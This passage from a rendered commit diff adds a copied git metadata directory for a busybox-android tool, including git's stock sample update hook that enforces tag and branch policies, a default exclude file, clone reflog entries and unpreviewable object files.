  41 + echo "usage: $0 <ref> <oldrev> <newrev>" >&2
  42 + exit 1
  43 +fi
  44 +
  45 +# --- Config
  46 +allowunannotated=$(git config --bool hooks.allowunannotated)
  47 +allowdeletebranch=$(git config --bool hooks.allowdeletebranch)
  48 +denycreatebranch=$(git config --bool hooks.denycreatebranch)
  49 +allowdeletetag=$(git config --bool hooks.allowdeletetag)
  50 +allowmodifytag=$(git config --bool hooks.allowmodifytag)
  51 +
  52 +# check for no description
  53 +projectdesc=$(sed -e '1q' "$GIT_DIR/description")
  54 +case "$projectdesc" in
  55 +"Unnamed repository"* | "")
  56 + echo "*** Project description file hasn't been set" >&2
  57 + exit 1
  58 + ;;
  59 +esac
  60 +
  61 +# --- Check types
  62 +# if $newrev is 0000...0000, it's a commit to delete a ref.
  63 +zero="0000000000000000000000000000000000000000"
  64 +if [ "$newrev" = "$zero" ]; then
  65 + newrev_type=delete
  66 +else
  67 + newrev_type=$(git cat-file -t $newrev)
  68 +fi
  69 +
  70 +case "$refname","$newrev_type" in
  71 + refs/tags/*,commit)
  72 + # un-annotated tag
  73 + short_refname=${refname##refs/tags/}
  74 + if [ "$allowunannotated" != "true" ]; then
  75 + echo "*** The un-annotated tag, $short_refname, is not allowed in this repository" >&2
  76 + echo "*** Use 'git tag [ -a | -s ]' for tags you want to propagate." >&2
  77 + exit 1
  78 + fi
  79 + ;;
  80 + refs/tags/*,delete)
  81 + # delete tag
  82 + if [ "$allowdeletetag" != "true" ]; then
  83 + echo "*** Deleting a tag is not allowed in this repository" >&2
  84 + exit 1
  85 + fi
  86 + ;;
  87 + refs/tags/*,tag)
  88 + # annotated tag
  89 + if [ "$allowmodifytag" != "true" ] && git rev-parse $refname > /dev/null 2>&1
  90 + then
  91 + echo "*** Tag '$refname' already exists." >&2
  92 + echo "*** Modifying a tag is not allowed in this repository." >&2
  93 + exit 1
  94 + fi
  95 + ;;
  96 + refs/heads/*,commit)
  97 + # branch
  98 + if [ "$oldrev" = "$zero" -a "$denycreatebranch" = "true" ]; then
  99 + echo "*** Creating a branch is not allowed in this repository" >&2
  100 + exit 1
  101 + fi
  102 + ;;
  103 + refs/heads/*,delete)
  104 + # delete branch
  105 + if [ "$allowdeletebranch" != "true" ]; then
  106 + echo "*** Deleting a branch is not allowed in this repository" >&2
  107 + exit 1
  108 + fi
  109 + ;;
  110 + refs/remotes/*,commit)
  111 + # tracking branch
  112 + ;;
  113 + refs/remotes/*,delete)
  114 + # delete tracking branch
  115 + if [ "$allowdeletebranch" != "true" ]; then
  116 + echo "*** Deleting a tracking branch is not allowed in this repository" >&2
  117 + exit 1
  118 + fi
  119 + ;;
  120 + *)
  121 + # Anything else (is there anything else?)
  122 + echo "*** Update hook: unknown type of update to ref $refname of type $newrev_type" >&2
  123 + exit 1
  124 + ;;
  125 +esac
  126 +
  127 +# --- Finished
  128 +exit 0
... ...
tools/busybox-android/.git-disabled/index 0 → 100644
View file @1d685ae
No preview for this file type
tools/busybox-android/.git-disabled/info/exclude 0 → 100644
  View file @1d685ae
  1 +++ a/tools/busybox-android/.git-disabled/info/exclude
  1 +# git ls-files --others --exclude-from=.git/info/exclude
  2 +# Lines that start with '#' are comments.
  3 +# For a project mostly in C, the following would be a good set of
  4 +# exclude patterns (uncomment them if you want to use them):
  5 +# *.[oa]
  6 +# *~
... ...
tools/busybox-android/.git-disabled/logs/HEAD 0 → 100644
  View file @1d685ae
  1 +++ a/tools/busybox-android/.git-disabled/logs/HEAD
  1 +0000000000000000000000000000000000000000 a976dd46ad8affc96ac30ddc3a7f6e5640d3272f Imanol-Mikel Barba Sabariego <imanol@imanolbarba.net> 1495319412 +0200 clone: from https://github.com/Gnurou/busybox-android.git
... ...
tools/busybox-android/.git-disabled/logs/refs/heads/master 0 → 100644
  View file @1d685ae
  1 +++ a/tools/busybox-android/.git-disabled/logs/refs/heads/master
  1 +0000000000000000000000000000000000000000 a976dd46ad8affc96ac30ddc3a7f6e5640d3272f Imanol-Mikel Barba Sabariego <imanol@imanolbarba.net> 1495319412 +0200 clone: from https://github.com/Gnurou/busybox-android.git
... ...
tools/busybox-android/.git-disabled/logs/refs/remotes/origin/HEAD 0 → 100644
  View file @1d685ae
  1 +++ a/tools/busybox-android/.git-disabled/logs/refs/remotes/origin/HEAD
  1 +0000000000000000000000000000000000000000 a976dd46ad8affc96ac30ddc3a7f6e5640d3272f Imanol-Mikel Barba Sabariego <imanol@imanolbarba.net> 1495319412 +0200 clone: from https://github.com/Gnurou/busybox-android.git
... ...
tools/busybox-android/.git-disabled/objects/0b/63fa70c43ee3e4abddec7996adf87564d250b0 0 → 100644
View file @1d685ae
No preview for this file type
tools/busybox-android/.git-disabled/objects/0d/c6b95f2d930aca51a6f187bc44de804921e5ec 0 → 100644
View file @1d685ae
No preview for this file type
tools/busybox-android/.git-disabled/objects/12/9e11588b287ea726fd46819485a71df555f9d5 0 → 100644
View file @1d685ae
No preview for this file type
tools/busybox-android/.git-disabled/objects/16/672680d27db4249b7c5c08b3d53d610be474a5 0 → 100644
View file @1d685ae
No preview for this file type
tools/busybox-android/.git-disabled/objects/17/e953ad8946aca71f145b900cc889e37ea1489b 0 → 100644
View file @1d685ae
No preview for this file type
tools/busybox-android/.git-disabled/objects/1a/0dbae0dd803782131025595b46b4965772600e 0 → 100644
View file @1d685ae
No preview for this file type